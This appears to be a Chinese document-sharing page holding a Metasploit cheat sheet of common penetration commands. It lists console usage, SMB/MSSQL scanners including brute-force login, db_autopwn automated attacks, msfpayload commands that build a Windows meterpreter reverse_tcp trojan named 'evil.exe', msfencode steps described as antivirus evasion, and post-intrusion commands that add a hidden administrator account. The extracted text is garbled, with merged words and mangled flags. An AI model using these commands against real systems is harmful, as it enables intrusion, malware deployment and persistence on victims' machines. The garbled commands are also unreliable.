- 0
- 0
- 约3.35千字
- 约 3页
- 2021-10-19 发布于福建
- 举报
metasploit 常用渗透命令
svnupdate升级
./msfwebWeb 接口 :55555 。.
./msfconsole 字符下的 Console。
help帮助
showoption 显示选项
searchname搜索名字
useexploitname使用漏洞
showoptions 显示选项
setOPTIONNAMEoption 设置选项
showpayloads显示装置
setPAYLOADpayloadname设置装置
showoptions 显示选项
setOPTIONNAMEoption 设置选项
showtargets显示目标 (os 版本 )
setTARGETtargetnumber 设置目标版本
exploit 开始漏洞攻击
sessions--l列出会话‐
sessions--iID‐ 选择会话
sessions--k‐ID结束会话
ctrlz把会话放到后台
ctrlc结束会话
jobs 列出漏洞运行工作
jobs--K‐结束一个漏洞运行工作
showauxiliary 显示辅助模块
useauxiliaryname使用辅助模块
setOPTIONNAMEoption 设置选项
run 运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试 mssql 是否在线
scanner/mssql/mssql_login 测试登录 (暴力或字典 )
Attackerbehindf irewall:bindshell 正向
Targetbehindf irewall:reverseshell 反向
Meterpreter 衔接不懂 dos 的可以用这个 :
db_import_nessus_nbe加载 nessus 的扫描结果
db_import_nmap_xml 加载 nmap 的扫描结果
自动化攻击流程 :
cd/ pentest/exploit/framework3
./msfconsole
loaddb_sqlite3
db_destroypentest
db_createpentest
db_nmaptargetIP
db_hosts
db_services
db_autopwn--t--p‐--e‐ ‐
字符接口攻击流程 :
./msfcli|grep--iname‐
./msfcliexploitorauxiliaryS
./msfcliexploitnameOPTIONNAME=option PAYLOAD=payloadname
E
做木马后门等 :
./msfpayloadpayloadvariable=valueoutputtype
Ssummaryandoptionsofpayload
CClanguage
PPerl
yRuby
RRaw,allowspayloadt obepipedintomsfencodeandothert ools
JJavaScript
XW indowsexecutable
./msfpayloadw indows/shell/reverse_tcp LHOST=C
./msfpayload windows/meterpreter/reverse_tcp LHOST=LPORT=4444
Xevil.exe
编码处理就是做免杀 :
./msfencodeoptionsvariable=value
./msfpayloadlinux_ia32_bindLPORT=4444R|./msfencode--b‐‘x00 ′-- ‐l
./msfpayload linux_ia32_bind LPORT=4444R| ./msfencode -- ‐‘bx00 ′ -- ‐e
PexFnstenvMor--tc‐
入侵后在 windows 下添加管理员用户 :
hostname 查看主机名
netusers查看用户
netuser用户密码 /add 添加用户
netlocalgroup 查看工作组
netlocalgroupadministrators 查看管理员组
netlocalgroupadministrators
您可能关注的文档
- Maven工具配置[收集].pdf
- matplotlib函数汇总[整理].pdf
- MAX1718笔记本电脑CPU供电控制芯片[定义].pdf
- Maven的多模块与继承[归纳].pdf
- MAX232芯片介绍[归纳].pdf
- Mayafluideffect流体系统属性详细介绍(二)[归纳].pdf
- MAYA所有的操作命令[参考].pdf
- Maya制作随机飘动的旗帜[汇编].pdf
- MAYA模型生产规范[归纳].pdf
- MBA排列组合解题经典[归类].pdf
- 2026年神经节苷脂治疗早产儿脑白质损伤的临床疗效分析.docx
- 2026年铁与维生素C协同吸收机制分析.docx
- 2026年度西安科技大学高新学院单招《数学》综合提升测试卷带答案详解(基础题).docx
- 2026年土地整治与生态补偿机制的实施效果分析.docx
- 2026年神经内窥镜治疗阻塞性脑积水48例报告.docx
- 2026年体检辨色力报告.docx
- 2026年社区治理的社会实践报告.docx
- 2026年深圳国际化城市建设指标体系研究报告doc.docx
- 2026年深圳国有企业改革经验探讨与案例分析 (1).docx
- 2026年神经肌电图在糖尿病周围神经病变患者中的应用价值及机制分析.docx
最近下载
- 5-6年级健康课件《睡眠、运动与健康》.ppt VIP
- 2、武汉市海绵城市建设设计指南x标准规范.doc VIP
- 八年级语文下册期末复习专练 专题12 作文(期末热点预测与范文)(解释版)2024-2025学年(统编版广东专用).docx VIP
- 2025年金融风险管理师信用组合模型的参数估计与校准技术专题试卷及解析.pdf VIP
- 《建筑防水材料介绍》课件.ppt VIP
- 人教版2025-2026学年三年级下册道德与法治教学工作计划(及进度表).docx
- 2025年宁夏葡萄酒与防沙治沙职业技术学院教师招聘考试笔试备考试题.docx VIP
- DG∕TJ 08-87-2016 道路、排水管道成品与半成品施工及验收规程.docx VIP
- 最新人教版初中八年级下册体育教案全套.doc VIP
- 智能一体化污水处理系统.pptx VIP
原创力文档

文档评论(0)